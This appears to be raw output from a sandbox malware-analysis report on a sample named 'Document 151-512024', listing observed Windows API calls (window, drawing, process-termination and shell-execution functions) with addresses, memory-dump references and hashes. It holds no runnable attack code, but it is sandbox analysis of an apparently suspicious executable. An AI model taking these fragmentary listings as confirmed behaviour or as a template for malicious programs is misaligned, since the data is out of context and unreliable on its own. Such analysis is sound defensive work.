                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0096339E
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009633B7
                                                                                                    • SetLastError.KERNEL32(00000000,?,00963379,00962FE5), ref: 00963409
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: c42e32f54a2f2b40367aa1c1de0539c42412f11a28bab853733d1bbbf5add253
                                                                                                    • Instruction ID: 590a90e877ffb9bd11ca409d0f16b64353d2645e19ef05286358456455c35d7b
                                                                                                    • Opcode Fuzzy Hash: c42e32f54a2f2b40367aa1c1de0539c42412f11a28bab853733d1bbbf5add253
                                                                                                    • Instruction Fuzzy Hash: 2001F23360D712BEEA252BF4BC86A676B98EB457B9760832AF510812F0FF114E139544
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00975686,00983CD6,?,00000000,?,00975B6A,?,?,?,?,?,0096E6D1,?,00A08A48), ref: 00972D78
                                                                                                    • _free.LIBCMT ref: 00972DAB
                                                                                                    • _free.LIBCMT ref: 00972DD3
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0096E6D1,?,00A08A48,00000010,00944F4A,?,?,00000000,00983CD6), ref: 00972DE0
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0096E6D1,?,00A08A48,00000010,00944F4A,?,?,00000000,00983CD6), ref: 00972DEC
                                                                                                    • _abort.LIBCMT ref: 00972DF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: 7d23cd2de1372d713f9bcebd6e57d1a93e017219641d4b5967a6228348dfccdb
                                                                                                    • Instruction ID: 9143c713c34111d251b3d53cbb883cfeca86d8c5a4f47a90c8ba84c32216757d
                                                                                                    • Opcode Fuzzy Hash: 7d23cd2de1372d713f9bcebd6e57d1a93e017219641d4b5967a6228348dfccdb
                                                                                                    • Instruction Fuzzy Hash: ECF0283796960177C6322778BC06F5A276DAFC27B0F25C619F82C961D2EF2488825120
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00959693
                                                                                                      • Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596A2
                                                                                                      • Part of subcall function 00959639: BeginPath.GDI32(?), ref: 009596B9
                                                                                                      • Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596E2
                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 009D8A4E
                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 009D8A62
                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 009D8A70
                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 009D8A80
                                                                                                    • EndPath.GDI32(?), ref: 009D8A90
                                                                                                    • StrokePath.GDI32(?), ref: 009D8AA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 43455801-0
                                                                                                    • Opcode ID: 125daebfc9a44b445adc5bdabf7b83dc8bebbfb6a02e14b2485aeca9bc99ce7e
                                                                                                    • Instruction ID: c345e0540a3996b03e3d249caabd57b535e56255763ede94e58eea246d2013e4
                                                                                                    • Opcode Fuzzy Hash: 125daebfc9a44b445adc5bdabf7b83dc8bebbfb6a02e14b2485aeca9bc99ce7e
                                                                                                    • Instruction Fuzzy Hash: 4111097604514DFFEF129F90DC88EAA7F6CEB08350F00C012FA199A1A1C7719D95EBA0
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 009A5218
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 009A5229
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009A5230
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 009A5238
                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009A524F
                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 009A5261
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    • Opcode ID: c9c715701f38d1ec7b97175f3a360b47c549b1794621502c2935d9dc651e5674
                                                                                                    • Instruction ID: f07ef8ffd579bd9f07d38d79deb427c1edafb0724156ce797ee75e2d0bf6c7ec
                                                                                                    • Opcode Fuzzy Hash: c9c715701f38d1ec7b97175f3a360b47c549b1794621502c2935d9dc651e5674
                                                                                                    • Instruction Fuzzy Hash: E7018FB5A45719BBEF109BE59C49B4EBFB8EF48351F044066FA04A7280D6709800DBA0
                                                                                                    APIs
                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00941BF4
                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00941BFC
                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00941C07
                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00941C12
                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00941C1A
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00941C22
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4278518827-0
                                                                                                    • Opcode ID: 36c8900d2f306aa97e72e450b11bd943a63426f5f40ef8c4fdf00138e5059b08
                                                                                                    • Instruction ID: dec43ec43034c8b61838035907ea1b9ae88cd125b283d86f2386ef4d27acee30
                                                                                                    • Opcode Fuzzy Hash: 36c8900d2f306aa97e72e450b11bd943a63426f5f40ef8c4fdf00138e5059b08
                                                                                                    • Instruction Fuzzy Hash: 8D016CB094275A7DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009AEB30
                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009AEB46
                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 009AEB55
                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009AEB64
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009AEB6E
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009AEB75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 839392675-0
                                                                                                    • Opcode ID: 392f20c861ceb365f8a8bc801bc3f059934589468a3510a89a47ed78a0c517f2
                                                                                                    • Instruction ID: 36e26da03d2a14ec46e05fbff991219675edfc3090b1e3fc24e7cc2effd599b8
                                                                                                    • Opcode Fuzzy Hash: 392f20c861ceb365f8a8bc801bc3f059934589468a3510a89a47ed78a0c517f2
                                                                                                    • Instruction Fuzzy Hash: 10F0B4B219612ABBEB205B529C0DEEF7F7CEFCBB11F00015AF601D1090D7A05A41D6B4
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?), ref: 00997452
                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00997469
                                                                                                    • GetWindowDC.USER32(?), ref: 00997475
                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00997484
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00997496
                                                                                                    • GetSysColor.USER32(00000005), ref: 009974B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 272304278-0
                                                                                                    • Opcode ID: 7ad74593071a6d1201ea558d5fdacf832962446aaefbd60364f4fc5cca01d760
                                                                                                    • Instruction ID: 8ab0523e97b6d28d9c7d956225a49ccab11d376be0a901fa9386d0f5755504ac
                                                                                                    • Opcode Fuzzy Hash: 7ad74593071a6d1201ea558d5fdacf832962446aaefbd60364f4fc5cca01d760
                                                                                                    • Instruction Fuzzy Hash: 36017871469216FFEB509FA4DC08BAABBB6FB04311F540161FA16A21A1CF311E81EB10
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009A187F
                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 009A188B
                                                                                                    • CloseHandle.KERNEL32(?), ref: 009A1894
                                                                                                    • CloseHandle.KERNEL32(?), ref: 009A189C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 009A18A5
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A18AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 146765662-0
                                                                                                    • Opcode ID: d905fdb7e460820356dad6e75475d6669f99c52ae4757f5c9e0d441cfdcdcaee
                                                                                                    • Instruction ID: 9702508d62021e8cc4bafb50161e4eb9359d6b0c942ee7d224594b5ee2c0cebf
                                                                                                    • Opcode Fuzzy Hash: d905fdb7e460820356dad6e75475d6669f99c52ae4757f5c9e0d441cfdcdcaee
                                                                                                    • Instruction Fuzzy Hash: D1E0EDB609D112FBDB016FA1ED0C905FF39FF497627108222F225810B0CB3254A0EF50
                                                                                                    APIs
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 009CAEA3
                                                                                                      • Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625
                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 009CAF38
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009CAF67
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                    • String ID: <$@
                                                                                                    • API String ID: 146682121-1426351568
                                                                                                    • Opcode ID: f53964a8a2091bec8022a94dd0cbe681d7a0b23581cde2b484dfb122b22e8d80
                                                                                                    • Instruction ID: 03441a088f5904497f38f96d906b5d15300fc2990ad61d86b43b0129b3e9995b
                                                                                                    • Opcode Fuzzy Hash: f53964a8a2091bec8022a94dd0cbe681d7a0b23581cde2b484dfb122b22e8d80
                                                                                                    • Instruction Fuzzy Hash: 92713571A00619DFCB14DF94C485A9EBBB4EF48314F04889DE816AB3A2C775ED45CB92
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(00EDFC50,?), ref: 009D62E2
                                                                                                    • ScreenToClient.USER32(?,?), ref: 009D6315
                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 009D6382
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3880355969-3368625520
                                                                                                    • Opcode ID: 8f6c9982d525761ded109a76aee8eba17f82fb143ce18fdb94daf6f550ff1655
                                                                                                    • Instruction ID: 7decfe9b77885bd896532e0a30f1079f3cb61b894ad405e00ad96a31ab18cc03
                                                                                                    • Opcode Fuzzy Hash: 8f6c9982d525761ded109a76aee8eba17f82fb143ce18fdb94daf6f550ff1655
                                                                                                    • Instruction Fuzzy Hash: FC512D74940205AFDF10DF68D980AAE7BB9EF55360F10825AF96597390D730ED81CB50
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009A7206
                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009A723C
                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009A724D
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009A72CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                    • String ID: DllGetClassObject
                                                                                                    • API String ID: 753597075-1075368562
                                                                                                    • Opcode ID: 9526dfe7a5565fc8b8028d9632109750ea043017572a29c5bf33f044b6ed1257
                                                                                                    • Instruction ID: e9569d0e38566dffab8dddc38e121c975a7d841cfcf6786949f962117c4e070d
                                                                                                    • Opcode Fuzzy Hash: 9526dfe7a5565fc8b8028d9632109750ea043017572a29c5bf33f044b6ed1257
                                                                                                    • Instruction Fuzzy Hash: 02418FB1604204EFDB15CF94CC86B9ABBB9EF85310F1480AABD059F20AD7B4D941CBE0
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009AC306
                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 009AC34C
                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A11990,Pl), ref: 009AC395
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                    • String ID: 0$Pl
                                                                                                    • API String ID: 135850232-2497859751
                                                                                                    • Opcode ID: 284c2069e127ef349de2847dee52048c25c4605414555a5ce4bc84eec1ba1117
                                                                                                    • Instruction ID: 3ce2becc92f8acaf5b7a126082913135a759ace339d43ded15b0c915cb7a3bd4
                                                                                                    • Opcode Fuzzy Hash: 284c2069e127ef349de2847dee52048c25c4605414555a5ce4bc84eec1ba1117
                                                                                                    • Instruction Fuzzy Hash: 0F41A3B12083019FDB24DF25D844F5ABBE8AFC6311F148A1DF9A59B2D1DB70E904CB92
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 009D5352
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D5375
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009D5382
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009D53A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3340791633-3368625520
                                                                                                    • Opcode ID: 0925d2fda94406f39b30853c5f00f3aaaca540ebd07a9273f183f30a124add47
                                                                                                    • Instruction ID: 678290fb128286dda8772709b3fbd62fa42d770a28af14993c1160b92820704f
                                                                                                    • Opcode Fuzzy Hash: 0925d2fda94406f39b30853c5f00f3aaaca540ebd07a9273f183f30a124add47
                                                                                                    • Instruction Fuzzy Hash: 3D31C074AD5A08EFEB349E54CC06BE8B76AAB043D0F59C503FA10963E1C7B49D90EB41
                                                                                                    APIs
                                                                                                    • ClientToScreen.USER32(?,?), ref: 009D769A
                                                                                                    • GetWindowRect.USER32(?,?), ref: 009D7710
                                                                                                    • PtInRect.USER32(?,?,009D8B89), ref: 009D7720
                                                                                                    • MessageBeep.USER32(00000000), ref: 009D778C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 1352109105-3368625520
                                                                                                    • Opcode ID: cc62cadfee94b26a875aa55dd8da179da3c019c38c45c532edc082ad1d05075b
                                                                                                    • Instruction ID: 93cefd06f2ead39ea8e32428aa88017dae32c90f490a79dbb0758ba9befaab44
                                                                                                    • Opcode Fuzzy Hash: cc62cadfee94b26a875aa55dd8da179da3c019c38c45c532edc082ad1d05075b
                                                                                                    • Instruction Fuzzy Hash: 09417C34A492159FCB01CFE8C894EA9B7F9BB49314F15C5AAE5249B361E730E942CB90
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009D4705
                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009D4713
                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009D471A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                    • String ID: 0n$msctls_updown32
                                                                                                    • API String ID: 4014797782-1044086328
                                                                                                    • Opcode ID: db0389bc83cf486073273f8d5591cd2b379e5f2516621d483892ac4593fe64f5
